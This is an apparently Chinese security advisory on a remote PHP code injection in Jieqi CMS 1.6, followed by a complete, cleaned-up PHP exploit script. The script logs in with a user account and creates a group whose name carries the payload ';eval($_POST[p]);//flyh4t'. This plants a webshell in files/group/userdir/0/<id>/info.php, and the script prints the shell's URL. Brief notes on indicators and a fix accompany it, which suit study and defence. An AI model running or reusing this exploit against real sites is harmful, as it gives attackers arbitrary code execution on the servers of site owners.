杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,官方宣称具备简单灵活、性能卓越、安全可靠等特性。其产品包括目前流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。

该系统存在多个远程安全漏洞。本文报告的是 1.6 版本的一个远程代码执行(PHP 代码注入)漏洞,应该已有 2 年多历史。
利用前提:需要一个已登录、且有权限创建圈子的用户账号(即此漏洞为认证后利用)。从下面的利用脚本看,注入点是 modules/group/create.php 的圈子名称字段 gname:它被写入 files/group/userdir/0/<圈子ID>/info.php 时未做转义,因此可借此植入 eval($_POST[p]) 形式的 webshell。修复方向是不要把用户输入直接写进可执行的 PHP 文件;如确需生成 PHP 配置,至少要对 gname 做严格的字符集校验并用 var_export() 之类的方式安全序列化。
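<?php
/**
 * Jieqi CMS V1.6 group-creation PHP code injection exploit (PoC).
 *
 * Original author: flyh4t (phpsec at hotmail dot com), http://www.wolvez.org
 * This is a cleaned-up version of the original script: same payload, same
 * request sequence, with the script-level bugs fixed (undefined $ch in the
 * error path, usage text missing the password argument, unchecked second
 * request, unchecked preg_match result, group id regex capped at 4 digits).
 *
 * What the script does:
 *   1. Logs in to the target with a user that may create groups ("圈子").
 *   2. POSTs a new group to modules/group/create.php whose `gname` field is
 *      `';eval($_POST[p]);//flyh4t`.  The original PoC relies on the CMS
 *      writing the group name unescaped into a PHP file at
 *      files/group/userdir/0/<group-id>/info.php, so the leading quote closes
 *      the string literal and eval($_POST[p]) becomes live code (the CMS side
 *      is not shown here; this is inferred from the payload and the final URL).
 *   3. Extracts the new group id from the response and prints the shell URL.
 *
 * For defenders: a multipart POST to modules/group/create.php whose gname
 * contains `eval(` / a quote, and any *.php under files/group/userdir/ that
 * contains eval($_POST[...]), are the indicators this PoC leaves behind.
 * The fix on the CMS side is to never write user-controlled strings into
 * executable PHP; if a PHP config file must be generated, whitelist the
 * characters of gname and serialise it with var_export() or equivalent.
 *
 * Usage: php <script> host path username password
 * Requires ext/curl.  Network I/O only; exits non-zero on failure.
 */

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

// Original author's note: "works regardless of php.ini settings" (presumably
// about magic_quotes on the target -- not verified here).

if ($argc < 5) {
    // $argv[0] + 4 arguments = 5; the original usage text omitted "password".
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host: target server (ip/hostname)
path: path to jieqicms
username: a username who can create group
password: the password of that user
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit(1);
}

error_reporting(7);               // E_ERROR | E_WARNING | E_PARSE, as in the original
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

// Normalise host + path into one base URL without doubled slashes
// (the original produced http://host//path//login.php for "/path/").
$base = rtrim('http://' . $host . '/' . trim($path, '/'), '/');

// Cookie jar for the authenticated session.  A temp file rather than
// ./cookie.txt, so the target's session cookie is not left lying in the CWD.
$cookie_jar = tempnam(sys_get_temp_dir(), 'jieqi');
if ($cookie_jar === false) {
    exit("could not create cookie jar\n");
}

/**
 * POST $body to $url using/updating the cookie jar.
 *
 * @param string $url
 * @param string $body           raw request body
 * @param string $cookie_jar     path of the Netscape-format cookie file
 * @param array  $extra_headers  additional request headers (e.g. Content-Type)
 * @return string|false          response body, or false on a transport error
 *                               (the cURL error is printed to stdout)
 */
function http_post($url, $body, $cookie_jar, array $extra_headers = array())
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
    // Return the body instead of printing it (replaces the ob_start() hack).
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    if ($extra_headers) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $extra_headers);
    }
    $resp = curl_exec($ch);
    if ($resp === false) {
        // The original referenced an undefined $ch here; use the live handle.
        echo "cURL Error: " . curl_error($ch) . "\n";
    }
    curl_close($ch);
    return $resp;
}

/**
 * Build a multipart/form-data body by hand (the original hard-coded it).
 *
 * @param array  $fields    name => value, sent as plain text parts
 * @param string $boundary  boundary value exactly as given in Content-Type
 * @return string           RFC 2046-style body with CRLF line endings
 */
function build_multipart(array $fields, $boundary)
{
    $body = '';
    foreach ($fields as $name => $value) {
        $body .= '--' . $boundary . "\r\n"
               . 'Content-Disposition: form-data; name="' . $name . '"' . "\r\n\r\n"
               . $value . "\r\n";
    }
    return $body . '--' . $boundary . "--\r\n";
}

/* step 1: log in and collect the session cookie */
$login = http_post(
    $base . '/login.php',
    // username/password are URL-encoded so a "&" or "%" in them cannot break
    // the form body; the original interpolated them raw.
    'password=' . urlencode($password)
    . '&username=' . urlencode($username)
    . '&usecookie=86400'
    // Value of the submit button: "&#160;登&#160;&#160;录&#160;" in GBK.
    . '&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B'
    . '&action=login&jumpreferer=1',
    $cookie_jar
);
if ($login === false) {
    unlink($cookie_jar);
    exit('exploit failed');
}

// Soft sanity check: cURL writes a comment header even when no cookie was
// set, so look for at least one non-comment line in the jar.
$got_cookie = false;
foreach (file($cookie_jar) as $line) {
    $line = trim($line);
    if ($line !== '' && $line[0] !== '#') {
        $got_cookie = true;
        break;
    }
}
if (!$got_cookie) {
    echo "warning: no session cookie received - login may have failed\n";
}

/* step 2: create a group whose name carries the payload */
$boundary = '---------------------------23281168279961';
$fields = array(
    // The payload.  The leading quote closes the string literal the CMS is
    // believed to write gname into; "//flyh4t" comments out the remainder of
    // that line.  The resulting shell takes its code in POST parameter "p".
    'gname'  => '\';eval($_POST[p]);//flyh4t',
    'gcatid' => '1',
    'gaudit' => '1',
    'gbrief' => '1',
);
$resp = http_post(
    $base . '/modules/group/create.php',
    build_multipart($fields, $boundary),
    $cookie_jar,
    array('Content-Type: multipart/form-data; boundary=' . $boundary)
);
unlink($cookie_jar);
if ($resp === false) {
    exit('exploit failed');
}

/* step 3: locate the new group id in the response */
// The original regex stopped at 4 digits and then used $shell[1] unchecked.
if (!preg_match('/g=([0-9]+)/', $resp, $m)) {
    echo "could not find a group id in the response - group creation probably failed\n";
    echo "(check that the user may create groups and that gcatid=1 exists)\n";
    exit(1);
}
$gid = $m[1];

echo "view you shell here(password:p)\r\n";
echo $base . '/files/group/userdir/0/' . $gid . '/info.php' . "\n";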